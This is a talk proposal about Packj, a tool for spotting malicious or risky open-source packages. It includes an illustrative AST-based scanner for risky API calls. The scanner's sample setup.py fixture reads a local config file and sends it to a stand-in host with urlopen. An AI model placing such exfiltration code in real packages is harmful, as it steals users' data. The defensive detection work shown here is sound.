Proposed by: Shiva Abhishek

Open-source software supply-chain risks beyond CVEs: attacks and defense

  1. Modern software apps and services are built using open-source software (OSS) because of its benefits and ease of use. Today, OSS is distributed as ready-to-use packages on popular public package registries such as PyPI, npm, and RubyGems.
  2. Because of this widespread use and popularity, bad actors leverage novel supply-chain attack vectors beyond CVEs, such as typosquatting, social engineering, and dependency confusion, to compromise OSS packages and propagate malware.
  3. Yet, there is no robust way to analyze published OSS packages and measure supply-chain cyber risks. Existing vulnerability scanners such as Dependabot assume trusted/benign third-party OSS code, and do not analyze code behavior to address these modern threats.
  4. In this talk, we will present a FOSS tool, called Packj, for developers and security researchers to mitigate OSS supply-chain attacks. Packj analyzes several code and metadata attributes that make a package vulnerable to supply-chain attacks, and flags all identified "weak links" for deeper review.
  5. For instance, Packj scans package metadata (e.g., Readme, homepage, description) to detect whether a package is dummy/typo-squatted/troll. It checks version history and release time gaps to detect if the package is actively maintained. It flags packages that have no publicly available source code repo and packages that lack two-factor authentication (2FA). It also carries out static+dynamic code analysis to analyze programmatic behavior, and flags the use of filesystem and network APIs that can exfiltrate sensitive data.
  6. By the end of this presentation, the audience will know various open-source supply-chain attack techniques, with examples, and tools/approaches for identifying risky dependencies. We will demo the tool and showcase our findings on malicious packages that we reported to the PyPI and RubyGems package registries.
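
The static side of the code analysis described in point 5 can be illustrated with a small scanner that parses a package file and reports where it imports or calls filesystem, network, process, or dynamic-code APIs. This is an added example, not Packj's own code; the module-to-category map, the function names, and the sample setup.py are assumptions constructed for illustration.

```python
import ast

# Assumed, illustrative module -> category map (not Packj's rule set).
RISKY_MODULES = {"socket": "network", "urllib": "network", "http": "network",
                 "requests": "network", "os": "filesystem/process",
                 "shutil": "filesystem", "subprocess": "process"}
RISKY_BUILTINS = {"open": "filesystem", "exec": "dynamic code", "eval": "dynamic code"}

# Constructed sample: a setup.py that reads a local file and sends it out.
SAMPLE_SETUP_PY = '''\
import os
from urllib.request import urlopen
from setuptools import setup

def _post_install():
    data = open(os.path.join("conf", "settings.cfg")).read()
    urlopen("https://example.invalid/collect", data=data.encode())

setup(name="examplepkg", version="0.0.1")
'''

def _dotted(func):
    """Turn a call target such as os.path.join into 'os.path.join'."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    return ".".join([func.id] + parts[::-1]) if isinstance(func, ast.Name) else None

def flag_risky_apis(source):
    """Return sorted (line, api, category) findings for one source file."""
    nodes = list(ast.walk(ast.parse(source)))
    aliases, findings = {}, set()
    for n in nodes:  # pass 1: imports, so aliases are known before calls
        if isinstance(n, ast.Import):
            pairs = [((a.asname or a.name).split(".")[0], a.name) for a in n.names]
        elif isinstance(n, ast.ImportFrom) and n.module:
            pairs = [(a.asname or a.name, n.module) for a in n.names]
        else:
            continue
        for local, module in pairs:
            aliases[local] = root = module.split(".")[0]
            if root in RISKY_MODULES:
                findings.add((n.lineno, module, RISKY_MODULES[root]))
    for n in nodes:  # pass 2: calls resolved through the import aliases
        name = _dotted(n.func) if isinstance(n, ast.Call) else None
        if name in RISKY_BUILTINS:
            findings.add((n.lineno, name, RISKY_BUILTINS[name]))
        elif name and aliases.get(name.split(".")[0]) in RISKY_MODULES:
            findings.add((n.lineno, name, RISKY_MODULES[aliases[name.split(".")[0]]]))
    return sorted(findings)
```

Calling flag_risky_apis(SAMPLE_SETUP_PY) returns the line, API and category of each hit. A finding marks code for review rather than proving malice, since many benign packages also read files and open connections.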

Source code/Reference: https://github.com/ossillate-inc/packj

Talk duration: